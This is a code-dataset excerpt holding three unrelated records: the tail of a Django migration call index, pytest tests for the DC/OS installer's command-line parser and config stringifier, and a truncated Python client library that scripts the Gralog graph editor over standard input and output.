57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((48, 26, 48, 73), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n'), ((57, 23, 57, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((58, 28, 58, 67), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((59, 29, 59, 64), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((60, 31, 60, 212), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((61, 25, 61, 130), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((62, 41, 62, 251), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((63, 30, 63, 103), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((64, 31, 64, 105), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((65, 27, 65, 97), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((66, 39, 66, 205), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((67, 37, 67, 235), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((68, 24, 68, 91), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((69, 40, 69, 125), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((70, 37, 70, 128), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((71, 36, 71, 226), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((72, 29, 72, 107), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((73, 25, 73, 193), 'django.db.models.FileField', 'models.FileField', (), '', False, 'from django.db import migrations, models\n'), ((74, 39, 74, 105), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import migrations, models\n'), ((75, 31, 75, 110), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((76, 34, 76, 107), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((78, 32, 78, 123), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((79, 27, 79, 138), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((81, 25, 81, 116), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((87, 23, 87, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((88, 25, 88, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((89, 29, 89, 126), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((98, 23, 98, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((99, 28, 99, 67), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((100, 29, 100, 64), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((101, 25, 101, 98), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((102, 26, 102, 123), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((103, 27, 103, 122), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((104, 35, 104, 219), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((105, 24, 105, 111), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((106, 39, 106, 131), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((107, 29, 107, 92), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((108, 25, 108, 200), 'django.db.models.FileField', 'models.FileField', (), '', False, 'from django.db import migrations, models\n'), ((109, 39, 109, 107), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import migrations, models\n'), ((110, 31, 110, 101), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((111, 34, 111, 107), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((112, 32, 112, 123), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((113, 27, 113, 138), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((116, 25, 116, 116), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((80, 61, 80, 81), 'django.db.models.SET', 'models.SET', ({(80, 72, 80, 80): '"""others"""'}, {}), "('others')", False, 'from django.db import migrations, models\n'), ((114, 57, 114, 77), 'django.db.models.SET', 'models.SET', ({(114, 68, 114, 76): '"""others"""'}, {}), "('others')", False, 'from django.db import migrations, models\n'), ((115, 60, 115, 80), 'django.db.models.SET', 'models.SET', ({(115, 71, 115, 79): '"""others"""'}, {}), "('others')", False, 'from django.db import migrations, models\n')] |
nkhanal0/dcos | dcos_installer/test_cli.py | fe0571b6519c86b6c33db4af42c63ab3e9087dcf | import pytest
import gen
from dcos_installer import cli
def test_default_arg_parser():
parser = cli.get_argument_parser().parse_args([])
assert parser.verbose is False
assert parser.port == 9000
assert parser.action == 'genconf'
def test_set_arg_parser():
argument_parser = cli.get_argument_parser()
def parse_args(arg_list):
return argument_parser.parse_args(arg_list)
parser = parse_args(['-v', '-p 12345'])
assert parser.verbose is True
assert parser.port == 12345
parser = parse_args(['--web'])
assert parser.action == 'web'
parser = parse_args(['--genconf'])
assert parser.action == 'genconf'
parser = parse_args(['--preflight'])
assert parser.action == 'preflight'
parser = parse_args(['--postflight'])
assert parser.action == 'postflight'
parser = parse_args(['--deploy'])
assert parser.action == 'deploy'
parser = parse_args(['--validate-config'])
assert parser.action == 'validate-config'
parser = parse_args(['--hash-password', 'foo'])
assert parser.password == 'foo'
assert parser.action == 'hash-password'
parser = parse_args(['--hash-password'])
assert parser.password is None
assert parser.action == 'hash-password'
parser = parse_args(['--set-superuser-password', 'foo'])
assert parser.password == 'foo'
assert parser.action == 'set-superuser-password'
parser = parse_args(['--set-superuser-password'])
assert parser.password is None
assert parser.action == 'set-superuser-password'
parser = parse_args(['--generate-node-upgrade-script', 'fake'])
assert parser.installed_cluster_version == 'fake'
assert parser.action == 'generate-node-upgrade-script'
# Can't do two at once
with pytest.raises(SystemExit):
parse_args(['--validate', '--hash-password', 'foo'])
def test_stringify_config():
stringify = gen.stringify_configuration
# Basic cases pass right through
assert dict() == stringify(dict())
assert {"foo": "bar"} == stringify({"foo": "bar"})
assert {"a": "b", "c": "d"} == stringify({"a": "b", "c": "d"})
# booleans are converted to lower case true / false
assert {"a": "true"} == stringify({"a": True})
assert {"a": "false"} == stringify({"a": False})
assert {"a": "b", "c": "false"} == stringify({"a": "b", "c": False})
# integers are made into strings
assert {"a": "1"} == stringify({"a": 1})
assert {"a": "4123"} == stringify({"a": 4123})
assert {"a": "b", "c": "9999"} == stringify({"a": "b", "c": 9999})
# Dict and list are converted to JSON
assert {"a": '["b"]'} == stringify({"a": ['b']})
assert {"a": '["b\\"a"]'} == stringify({"a": ['b"a']})
assert {"a": '[1]'} == stringify({"a": [1]})
assert {"a": '[1, 2, 3, 4]'} == stringify({"a": [1, 2, 3, 4]})
assert {"a": '[true, false]'} == stringify({"a": [True, False]})
assert {"a": '{"b": "c"}'} == stringify({"a": {"b": "c"}})
assert {"a": '{"b": 1}'} == stringify({"a": {"b": 1}})
assert {"a": '{"b": true}'} == stringify({"a": {"b": True}})
assert {"a": '{"b": null}'} == stringify({"a": {"b": None}})
# Random types produce an error.
with pytest.raises(Exception):
stringify({"a": set()})
# All the handled types at once
assert {
"a": "b",
"c": "true",
"d": "1",
"e": "[1]",
"f": '{"g": "h"}'
} == stringify({"a": "b", "c": True, "d": 1, "e": [1], "f": {"g": "h"}})
| [((15, 22, 15, 47), 'dcos_installer.cli.get_argument_parser', 'cli.get_argument_parser', ({}, {}), '()', False, 'from dcos_installer import cli\n'), ((56, 9, 56, 34), 'pytest.raises', 'pytest.raises', ({(56, 23, 56, 33): 'SystemExit'}, {}), '(SystemExit)', False, 'import pytest\n'), ((90, 9, 90, 33), 'pytest.raises', 'pytest.raises', ({(90, 23, 90, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((8, 13, 8, 38), 'dcos_installer.cli.get_argument_parser', 'cli.get_argument_parser', ({}, {}), '()', False, 'from dcos_installer import cli\n')] |
gralog/gralog | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | 0ab2e3137b83950cdc4e9234d4df451a22034285 | #!/usr/bin/env python3
import sys
from random import randint
import os
try:
import networkx as nx
except:
print("gPrint#-1#" + "netwrokx not installed for " + sys.executable)
sys.stdout.flush()
try:
import igraph as ig
except:
print("gPrint#-1#" + "igraph not installed for " + sys.executable)
import xml.etree.cElementTree as ET
import math
# debugging = False
class Vertex:
def __init__(self, graph, vid):
self.sourced = False
self.id = int(vid)
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["strokeColor"] = None
self.properties["shape"] = None
self.properties["coordinates"] = None
self.incomingEdges = []
self.outgoingEdges = []
self.incidentEdges = []
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
valueType = ""
try:
prop = propVal[0]
valueType = propVal[1]
except:
pass
try:
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
castedValue = self.graph.castValueToType(val, typ)
self.properties[prop] = castedValue
except:
pass
def getId(self):
return self.id
def getLabel(self):
if not self.wasSourced:
self.source()
return self.properties["label"]
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setVertexLabel(self.id, label)
def setCoordinates(self, coordinates):
co = self.properties["coordinates"]
x = coordinates[0]
y = coordinates[1]
if co == None:
co = (None, None)
if x == None:
x = co[0]
if y == None:
y = co[1]
newCoordinates = (x, y)
self.properties["coordinates"] = newCoordinates
self.graph.setVertexCoordinates(self.id, newCoordinates)
def setFillColor(self, colorHex=-1, colorRGB=-1):
self.setColor(colorHex, colorRGB)
def getFillColor(self):
return self.getColor()
def getColor(self):
if not self.wasSourced:
self.source()
return self.properties["color"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["fillColor"] = colorHex
elif colorRGB != -1:
self.properties["fillColor"] = colorRGB
else:
return
self.graph.setVertexFillColor(self.id, colorHex, colorRGB)
def setStrokeColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["strokeColor"] = colorHex
elif colorRGB != -1:
self.properties["strokeColor"] = colorRGB
else:
return
self.graph.setVertexStrokeColor(self.id, colorHex, colorRGB)
def getStrokeColor(self):
if not self.sourced:
self.source()
return self.properties["strokeColor"]
def setRadius(self, radius):
self.properties["radius"] = radius
self.properties["width"] = radius
self.properties["height"] = radius
self.graph.setVertexRadius(self.id, radius)
def setWidth(self, width):
self.properties["width"] = width
self.graph.setVertexWidth(self.getId(), width)
def setHeight(self, height):
self.properties["height"] = height
self.graph.setVertexHeight(self.getId(), height)
def setShape(self, shape):
self.properties["shape"] = shape
self.graph.setVertexShape(self.id, shape)
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setVertexProperty(self.id, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
if not self.sourced:
self.source()
return self.properties[prop]
def getNeighbours(self):
return self.graph.getNeighbours(self.id)
def getOutgoingNeighbours(self):
return self.graph.getOutgoingNeighbours(self.id)
def getIncomingNeighbours(self):
return self.graph.getIncomingNeighbours(self.id)
def getOutgoingEdges(self):
return self.graph.getOutgoingEdges(self.id)
def getIncomingEdges(self):
return self.graph.getIncomingEdges(self.id)
def getIncidentEdges(self):
return self.graph.getIncidentEdges(self.id)
def delete(self):
return self.graph.deleteVertex(self)
def connect(self, v1, edgeId=-1):
return self.graph.addEdge(self, v1, edgeId)
def getAllEdgesBetween(self, vertex2):
return self.graph.getAllEdgesBetween((self.id, vertex2))
def source(self):
return self.graph.getVertex(self)
def __str__(self):
return str(self.getId())
# what if i want to get a vertex? should i also get all its neighbours? how about incident edges? This is all v aufw\"andig and leads to the paradigm by which we just store the grpah in python???
class Edge:
# private methods
def __init__(self, graph, eid):
self.sourced = False
self.id = int(eid) #if -2, then imported without id like in TGF
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["weight"] = None
self.properties["contour"] = None
self.properties["source"] = None
self.properties["target"] = None
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
try:
prop = propVal[0]
valueType = propVal[1]
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
self.properties[prop] = self.graph.castValueToType(val, typ)
except:
pass
def setTarget(self, target): # don't use!!
self.properties["target"] = target
def setSource(self, source):
self.properties["source"] = source
# public methods
def getId(self):
return self.id
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setEdgeLabel(self.id, label)
def getLabel(self):
if not self.sourced:
self.source()
return self.properties["label"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["color"] = colorHex
elif colorRGB != -1:
self.properties["color"] = colorRGB
else:
return
self.graph.setEdgeColor(self.id, colorHex, colorRGB)
def getColor(self):
if not self.sourced:
self.source()
return self.properties["color"]
def setWeight(self, weight):
self.properties["weight"] = float(weight)
self.graph.setEdgeWeight(self.id, weight)
def getWeight(self):
if not self.sourced:
self.source()
return self.properties["weight"]
def setThickness(self, thickness):
self.properties["thickness"] = float(thickness)
self.graph.setEdgeThickness(self.id, thickness)
def getThickness(self):
if not self.sourced:
self.source()
return self.properties["thickness"]
def setContour(self, contour):
self.properties["contour"] = contour
self.graph.setEdgeContour(self.id, contour)
def getContour(self):
if not self.sourced:
self.source()
return self.properties["contour"]
def getSource(self):
if not self.sourced:
self.source()
return self.properties["source"]
def getTarget(self):
if not self.sourced:
self.source()
return self.properties["target"]
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setEdgeProperty(self, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
self.source()
return self.properties[prop]
def delete(self):
return self.graph.deleteEdge(self.id)
def source(self):
return self.graph.getEdge(self)
def getAdjacentEdges(self):
return self.graph.getAdjacentEdges(self.id)
def __str__(self):
v = self.getId()
v_str = str(v)
source = self.getSource().getId()
target = self.getTarget().getId()
return "({:},{:})".format(source, target)
def rgbFormatter(colorRGB):
r = colorRGB[0]
g = colorRGB[1]
b = colorRGB[2]
s = "rgb"
s += "(" + str(r).rstrip() + "," + \
str(g).rstrip() + "," + str(b).rstrip() + ")"
return s.rstrip()
def hexFormatter(colorHex):
s = "hex"
if colorHex[0] == "#":
colorHex = colorHex[1:]
s += "("+str(colorHex).rstrip() + ")"
return s.rstrip()
def vertexId(vertex):
if isinstance(vertex, Vertex):
return vertex.getId()
return vertex
def edgeId(edge):
if isinstance(edge, Edge):
return edge.getId()
return edge
def extractIdFromProperties(stringFromGralog):
strings = stringFromGralog.split(",")
for string in strings:
propVal = string.split("=")
if propVal[0] == "id":
return propVal[1]
return None
def edgeSplitter(edge):
if type(edge) == tuple and len(edge) == 2: # edge as defined by start, end nodes
return str(vertexId(edge[0])).rstrip()+","+str(vertexId(edge[1])).rstrip()
if type(edge) == int: # edge is given by id
return str(edge).rstrip()
return str(edge.getId()).rstrip()#edge has type Edge
class Graph:
def __init__(self, format="Undirected Graph"):
# perform analysis of graph
self.id_to_vertex = dict()
self.id_to_edge = dict()
self.lastIndex = -1
self.id = -1
self.variablesToTrack = dict()
if format == None or format.lower() == "none":
# we want a new graph
print("useCurrentGraph")
sys.stdout.flush()
self.lastIndex = -1
self.id = sys.stdin.readline()
self.getGraph("gtgf")
else:
print(format)
sys.stdout.flush()
self.id = sys.stdin.readline()
# helper functions
def castValueToType(self, val, typ):
if typ == "float":
return float(val)
if typ == "int":
return int(val)
if typ == "bool":
return bool(val)
if typ == "string":
return str(val)
if typ == "vertex":
return self.getVertexOrNew(val)
return val
def getVertexOrNew(self, currId):
v = currId
if (isinstance(currId, str)):
currId = int(currId)
if (isinstance(currId, int)):
if currId in self.id_to_vertex:
v=self.id_to_vertex[currId]
else:
v=Vertex(self, currId)
self.id_to_vertex[currId] = v
return v
def getEdgeOrNew(self, currId):
if type(currId) == tuple:
e = self.getEdgeIdByEndpoints(currId)
return e
e = currId
if not (isinstance(currId, Edge)):
try:
e = self.id_to_edge[int(currId)]
except:
e = Edge(self, currId)
else:
gPrint("Error (getEdgeOrNew()): the argument \
is neither an edge id nor a pair of vertices.")
return e
def termToEdge(self, term):
endpoints = term.split(",")
eid = int(endpoints[0])
e = self.id_to_edge[eid]
e.sourceProperties(endpoints[0])
sourceId = int(endpoints[1])
source = self.getVertexOrNew(sourceId)
targetId = int(endpoints[2])
target = self.getVertexOrNew(targetId)
e.setSource(source)
e.setTarget(target)
return e
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
def edgifyTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
e = self.getEdgeOrNew(-2)
e.setSource(v1)
e.setTarget(v2)
def vertexifyTGFCommand(self, line):
line = line.strip()
vString = line[0]
v = self.getVertexOrNew(int(vString))
self.vertices[v.getId()] = v
def edgifyGTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
eid = int(endpoints[2])
e = self.getEdgeOrNew(eid)
e.setSource(v1)
e.setTarget(v2)
self.id_to_edge[eid] = e
def vertexifyGTGFCommand(self, line):
self.vertexifyTGFCommand(line)
def getEdgeIdByEndpoints(self, endpoints):
line = "getEdgeIdByEndpoints#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(endpoints)
print(line.rstrip())
sys.stdout.flush()
edgeId = sys.stdin.readline().rstrip()
return edgeId
def getVertex(self, vertex):
line = "getVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print (line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex
def getEdge(self, edge):
line = "getEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print (line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge
# end helper functions
# Graph Manipulating Functions
def addVertex(self, vertexId=-1, pos=(None, None)):
# return: Vertex object with id
line = "addVertex#" + str(self.id).rstrip()
x = -1
y = -1
vertexIdSwap = False
if type(vertexId) == tuple and pos == (None, None):
x = vertexId[0]
y = vertexId[1]
vertexId = -1
else:
x = pos[0]
y = pos[1]
if vertexId != -1:
line += "#"+str(vertexId).rstrip()
if x != None and y != None:
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
vid = sys.stdin.readline()
v = Vertex(self, vid)
self.id_to_vertex[v.getId()] = v
return v
def deleteVertex(self, v):
edges = self.getIncidentEdges(v)
for e in edges:
del self.id_to_edge[e.getId()]
v = vertexId(v)
del self.id_to_vertex[v]
print("deleteVertex#" + str(self.id).rstrip() + "#" + str(v))
sys.stdout.flush()
def addEdge(self, sourceVertex, targetVertex, edgeId = -1):
# return: Edge object with id only
sourceVertex = vertexId(sourceVertex)
targetVertex = vertexId(targetVertex)
idSubString = ""
if not edgeId == -1:
idSubString = "#"+str(edgeId)
line = "addEdge#"+str(self.id).rstrip() + "#" + str(sourceVertex).rstrip() + \
"#" + str(targetVertex).rstrip() + idSubString.rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline()
if eid != "\n": # it's possible that the edge cannot be added (e.g., a new selfloop)
e = Edge(self, eid)
self.id_to_edge[e.getId()] = e
return e
return None
def existsEdge(self, edge):
line = "existsEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
thereExistsAnEdge = sys.stdin.readline().rstrip()
return thereExistsAnEdge.lower() == "true"
def existsVertex(self, vertex):
line = "existsVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
thereExistsAVertex = sys.stdin.readline().rstrip()
return thereExistsAVertex.lower() == "true"
def deleteEdge(self, edge):
del self.id_to_edge[edge.getId()]
line = "deleteEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
def getAllEdgesBetween(self, vertexPair):
line = "getAllEdgesBetween#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(vertexPair)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
# creates a random Erdos-Reny graph with n id_to_vertex and edge probability p
def generateRandomGraph(self, vertexCount, p):
if not isinstance(vertexCount, int):
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number must be an int.")
if vertexCount < 0:
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number cannot be less than 0.")
if not isinstance(p, float) or p < 0 or p > 1.0:
gPrint("Cannot generate a random graph, wrong parameter: \
probability of an edge must be a float in [0,1].")
if vertexCount == 0:
return
vertices = []
coordinates = dict()
for id in range(vertexCount):
coordinates[id] = (10*math.cos(2*id*math.pi/vertexCount),
10*math.sin(2*id*math.pi/vertexCount))
nxgraph = nx.fast_gnp_random_graph(vertexCount, p)
d = dict()
id = 0
for nxV in nxgraph.nodes():
d[id] = nxV
id += 1
nxEdges = nxgraph.edges()
id = 0
for x in range(vertexCount):
vertices.append(self.addVertex(id, coordinates[id]))
id += 1
for x in vertices:
for y in vertices:
if x.getId() < y.getId():
if (d[x.getId()], d[y.getId()]) in nxEdges:
x.connect(y)
# end manilupative functions
# setter functions
# begin: best for private use!
def setVertexFillColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
line = "setVertexFillColor#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1):
try:
line = line + rgbFormatter(colorRGB)
except:
self.sendErrorToGralog("the rgb color: " + str(colorRGB).rstrip() + " is not properly formatted!")
else:
self.sendErrorToGralog("neither Hex nor RGB color specified!")
print(line.rstrip())
sys.stdout.flush()
def setVertexStrokeColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
# print("colorhex: " + str(colorHex))
line = "setVertexStrokeColor#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexCoordinates(self, vertex, coordinates):
line = "setVertexCoordinates#" + str(self.id).rstrip()+"#" + str(vertexId(vertex)).rstrip()
x = -1
y = -1
x = coordinates[0]
y = coordinates[1]
if x == None:
x = "empty"
if y == None:
y = "empty"
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
def setEdgeContour(self, edge, contour):
line = line = "setEdgeContour#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + str(contour).rstrip()
print(line)
sys.stdout.flush()
def setEdgeColor(self, edge, colorHex=-1, colorRGB=-1):
line = "setEdgeColor#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#"
if not (colorHex == -1):
line = line + hexFormatter(colorHex)
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexRadius(self, vertex, newRadius):
self.setVertexDimension(vertex, newRadius, "radius")
def setVertexHeight(self, vertex, newHeight):
self.setVertexDimension(vertex, newHeight, "height")
def setVertexWidth(self, vertex, newWidth):
self.setVertexDimension(vertex, newWidth, "width")
def setVertexDimension(self, vertex, newDimension, dimension):
vertex = vertexId(vertex)
line = "setVertexDimension#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(newDimension).rstrip()+"#" + dimension.rstrip()
print(line.rstrip())
sys.stdout.flush()
def setVertexShape(self, vertex, shape):
vertex = vertexId(vertex)
line = "setVertexShape#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(shape).rstrip()
print(line.rstrip())
sys.stdout.flush()
def setEdgeWeight(self, edge, weight):
self.setEdgeProperty(edge, "weight", weight)
def setEdgeThickness(self, edge, thickness):
self.setEdgeProperty(edge, "thickness", thickness)
def setEdgeProperty(self, edge, propertyName, value):
line = "setEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setVertexProperty(self, vertex, propertyName, value):
line = "setVertexProperty#"+str(self.id).rstrip() + "#"
line = line + str(vertexId(vertex)).rstrip()
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setEdgeLabel(self, edge, label):
line = "setEdgeLabel#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + label
print(line.rstrip())
sys.stdout.flush()
def setVertexLabel(self, vertex, label):
vertex = vertexId(vertex)
line = "setVertexLabel#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + label
print(line.rstrip())
sys.stdout.flush()
# end: best for private use!
def setGraph(self, graphFormat, graphString = "hello_world"):
graphFormat = graphFormat.lower()
line = "setGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()+"#"
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$$\n"
line += graphString
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$\n"
print(line)
sys.stdout.flush()
# TODO: implement this
# end setter functions
# getter functions
def toIgraph(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ig = ig.Graph.Read_GraphML("tmp.graphml")
os.remove("tmp.graphml")
return g_ig
def toNx(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_nx = nx.read_graphml("tmp.graphml")
os.remove("tmp.graphml")
return g_nx
def toElementTree(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ET = ET.parse("tmp.graphml")
os.remove("tmp.graphml")
return g_ET
def toXml(self):
return self.getGraph("xml")
def getGraph(self, graphFormat):
# warning!! importing as pure TGF will mean edge id's will
# be lost. This will result in errors on the Gralog side.
line = "getGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()
print(line.rstrip())
i = 0
sys.stdout.flush()
line = sys.stdin.readline()
graphString = ""
if graphFormat.lower() == "tgf" or graphFormat.lower() == "gtgf":
tgf = graphFormat.lower() == "tgf"
multiline = False
first = False
if line[0] == line[1] == '$':
multiline = True
if tgf:
first = True
line = sys.stdin.readline()
hashtagSeen = False
if not multiline:
return graphString
while line[0] != '$':
# gPrint("line: " + line +" and line[0]: " + line[0] + " and line[0]!='$': " + str(line[0] != '$'))
graphString += line
if line[0] == '#':
hashtagSeen = True
else:
if not first:
if hashtagSeen:
if tgf:
self.edgifyTGFCommand(line)
else:
self.edgifyGTGFCommand(line)
else:
if tgf:
self.vertexifyTGFCommand(line)
else:
self.vertexifyGTGFCommand(line)
line = sys.stdin.readline()
i += 1
first = False
return graphString
if graphFormat.lower() == "xml":
return line
def getAllVertices(self):
# return: list of Vertex objects with id
line = "getAllVertices#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vertexIdStringList = (sys.stdin.readline()).split("#")
vertexList = []
for vertexIdString in vertexIdStringList:
if representsInt(vertexIdString):
v = self.getVertexOrNew(vertexIdString)
vertexList.append(v)
return vertexList
def getVertices(self):
return(self.getAllVertices())
def getAllEdges(self):
# return: list of fully sourced Edge objects with fully sourced endpoint Vertices
line = "getAllEdges#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
if len(endpointList) == 1 and endpointList[-1] == "\n":
endpointList = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdges(self):
